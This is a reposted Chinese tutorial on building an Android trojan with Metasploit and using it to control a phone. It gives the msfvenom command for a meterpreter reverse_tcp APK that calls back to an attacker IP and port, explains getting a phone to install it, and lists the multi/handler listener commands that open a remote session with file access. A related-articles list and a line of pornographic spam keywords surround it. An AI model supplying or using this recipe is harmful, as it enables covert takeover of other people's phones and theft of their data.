国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

msf使用木馬控制android手機(jī)

這篇具有很好參考價(jià)值的文章主要介紹了msf使用木馬控制android手機(jī)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

msf使用木馬控制android手機(jī)

環(huán)境:

kali、手機(jī)模擬器(或不用的手機(jī))。

要求

手機(jī)模擬器(或者手機(jī))與電腦可以互相連通嗎,即手機(jī)可以直接訪問(wèn)到kali。

步驟

1、制作木馬。

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 > android_shell.apk
msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透

2、手機(jī)安裝木馬。
想辦法把木馬放到手機(jī)模擬器(或者手機(jī))里。
例如:kali開啟http服務(wù),然后手機(jī)鏈接、下載、安裝。
msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透
msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透

3、kali開啟監(jiān)聽。

這里要注意的是,此處的參數(shù)要與制作木馬時(shí)的參數(shù)保持一致。

msfconsole			//開啟msf
use exploit/multi/handler			//選擇監(jiān)聽模塊
set lhost 192.168.32.135			//設(shè)置參數(shù)監(jiān)聽段的ip(kali的ip)
set lport 4444						//設(shè)置參數(shù)監(jiān)聽使用的端口(kali的端口)
set payload android/meterpreter/reverse_tcp			//設(shè)置payload。(這一個(gè)必須設(shè)置)
run									//開始監(jiān)聽

msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透
msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透

4、成功,開啟控制臺(tái)。
輸入?后下面顯示的都是可用的命令。
msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透

例如文件上傳:

msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透
msf制作安卓木馬,滲透測(cè)試,android,msf,msfconsole,木馬,滲透文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-685868.html

到了這里,關(guān)于msf使用木馬控制android手機(jī)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 利用msf進(jìn)行內(nèi)網(wǎng)的木馬滲透詳細(xì)教程

    利用msf進(jìn)行內(nèi)網(wǎng)的木馬滲透詳細(xì)教程

    本文僅限學(xué)術(shù)交流,請(qǐng)勿用他人實(shí)踐 本文通過(guò)kali系統(tǒng)進(jìn)行內(nèi)網(wǎng)滲透。主機(jī) ip:172.20.10.14 靶機(jī)ip:172.20.10.3(win10)? 文章目錄 前言 一 準(zhǔn)備工作 二 進(jìn)行滲透 1.開啟服務(wù):需要開啟apache和postgresql服務(wù) 2.制作木馬文件,利用msf進(jìn)行滲透 總結(jié)? 提示:以下是本篇文章正文內(nèi)容,下

    2023年04月08日
    瀏覽(24)
  • MSF手機(jī)滲透實(shí)驗(yàn)

    MSF手機(jī)滲透實(shí)驗(yàn)

    ? 本實(shí)驗(yàn)是在kail里面使用msf工具生成一個(gè)Android木馬程序,然后客戶端進(jìn)行下載,從而滲透。 實(shí)驗(yàn)范圍為局域網(wǎng)的手機(jī),即入侵的手機(jī)要與電腦處于同一個(gè)網(wǎng)段,這就需要將虛擬機(jī)設(shè)置為橋接模式,并手動(dòng)配置ip。 此時(shí)手機(jī)的ip段為192.168.43.0段故需要更改虛擬機(jī)ip 更改靜態(tài)i

    2024年02月11日
    瀏覽(23)
  • MSF生成木馬及木馬的簡(jiǎn)單使用

    MSF生成木馬及木馬的簡(jiǎn)單使用

    本文將介紹有關(guān)MSF木馬模塊的簡(jiǎn)單使用方式,介紹常見的幾種木馬生成方式,如有不對(duì)的地方,歡迎大家在評(píng)論區(qū)指正。 由于本文僅對(duì)部分模塊的簡(jiǎn)單使用進(jìn)行說(shuō)明,更多信息請(qǐng)參考官方網(wǎng)址MSFVENOM 環(huán)境配置說(shuō)明 在kali虛擬機(jī)中使用 msfvenom 命令,查看kali中是否安裝msfvenom模塊

    2023年04月09日
    瀏覽(29)
  • 【黑客滲透】-- 遠(yuǎn)程木馬控制

    【黑客滲透】-- 遠(yuǎn)程木馬控制

    目錄 系列文章目錄 文章目錄 網(wǎng)絡(luò)搭建系列:網(wǎng)絡(luò)攻擊 Windows服務(wù)器搭建系列:Windwos服務(wù)器搭建 ?滲透系列:? 前言 一、什么是木馬遠(yuǎn)程控制? 二、正文 1)實(shí)驗(yàn)?zāi)康?2)實(shí)驗(yàn)背景 3)實(shí)驗(yàn)設(shè)備 4)實(shí)驗(yàn)配置 1.實(shí)驗(yàn)設(shè)備均在VMnet 2中? 2.實(shí)驗(yàn)設(shè)備IP 3.實(shí)驗(yàn)軟件 4.測(cè)試連通性 5.打開軟件 6.利用

    2024年02月19日
    瀏覽(22)
  • MSF入侵安卓手機(jī)

    MSF入侵安卓手機(jī)

    MSF是Metasploit的簡(jiǎn)稱,Metasploit是一款開源的安全漏洞檢測(cè)工具,非常強(qiáng)大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。 我這里做測(cè)試的系統(tǒng)是Backbox linux ,這是一款網(wǎng)絡(luò)滲透,信息安全評(píng)估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當(dāng)然還有

    2024年02月06日
    瀏覽(20)
  • kali安卓手機(jī)木馬遠(yuǎn)控

    kali安卓手機(jī)木馬遠(yuǎn)控

    得到kali本機(jī)IP,設(shè)置端口 利用msf payload模塊生成木馬 命令: msfvenom -p android/meterpreter/reverse_tcp ? lhost=192.168.174.129 lport=5555 R 1.apk 木馬生成后 開啟我們的監(jiān)聽模塊msfconsole 進(jìn)入控制端后,設(shè)置一個(gè)安卓的playload(之前使用過(guò)的) ? 設(shè)置監(jiān)聽kali虛擬機(jī)的ip地址和端口號(hào)(與之前生

    2024年02月13日
    瀏覽(32)
  • MSF手機(jī)滲透實(shí)驗(yàn)(未成功)(CVE-2019-2215 Binder UA)

    MSF手機(jī)滲透實(shí)驗(yàn)(未成功)(CVE-2019-2215 Binder UA)

    最近想利用metasploit對(duì)手機(jī)進(jìn)行依次滲透實(shí)驗(yàn)。 通過(guò)查看最近三年的安卓漏洞,我對(duì)CVE-2019-2215這個(gè)漏洞很感興趣。 幸運(yùn)的是,metasploit里就有這個(gè)漏洞的攻擊payload,于是我就開始試試了。 在環(huán)境的準(zhǔn)備中,你需要有一個(gè)kali環(huán)境??梢詤⒖嘉业倪@篇博客: 5分鐘完成 Kali linux安

    2024年02月09日
    瀏覽(18)
  • Kali Linux利用MSF入侵安卓手機(jī)

    Kali Linux利用MSF入侵安卓手機(jī)

    Kali Linux利用MSF入侵安卓手機(jī) 一、什么是msf msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來(lái)生成后門的軟件。 MSFvenom是Msfpayload和Msfencode的組合,將這兩個(gè)工具都放在一個(gè)Framework實(shí)例中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。 演示

    2024年02月10日
    瀏覽(25)
  • 內(nèi)網(wǎng)滲透—代理Socks協(xié)議、路由不出網(wǎng)、后滲透通訊、CS-MSF控制上線

    內(nèi)網(wǎng)滲透—代理Socks協(xié)議、路由不出網(wǎng)、后滲透通訊、CS-MSF控制上線

    ??本章主要涉及到的技術(shù)就是如何讓攻擊機(jī)通過(guò)能夠上網(wǎng)的主機(jī)當(dāng)作跳板去連接內(nèi)網(wǎng)中不能上網(wǎng)的主機(jī),有點(diǎn)繞口。不過(guò)通過(guò)介紹頁(yè)能夠大概明白是什么意思。 ??在我們做滲透的時(shí)候,通常企業(yè)都會(huì)設(shè)定有些軟硬件防火墻,當(dāng)企業(yè)有業(yè)務(wù)需求的時(shí)候會(huì)通過(guò)防火墻放通地址

    2024年02月05日
    瀏覽(26)
  • 手機(jī)木馬遠(yuǎn)程控制復(fù)現(xiàn)

    手機(jī)木馬遠(yuǎn)程控制復(fù)現(xiàn)

    目錄 前言 系列文章列表 滲透測(cè)試基礎(chǔ)之永恒之藍(lán)漏洞復(fù)現(xiàn)http://t.csdn.cn/EsMu2 思維導(dǎo)圖 1,實(shí)驗(yàn)涉及復(fù)現(xiàn)環(huán)境??? 2,Android模擬器環(huán)境配置 2.1,首先從官網(wǎng)上下載雷電模擬器 2.2,安裝雷電模擬器? 2.3,?對(duì)模擬器網(wǎng)絡(luò)進(jìn)行配置 2.3.1,為什么要進(jìn)行配置 2.3.2,進(jìn)行配置? 2.3.3,安裝成功后

    2024年02月09日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包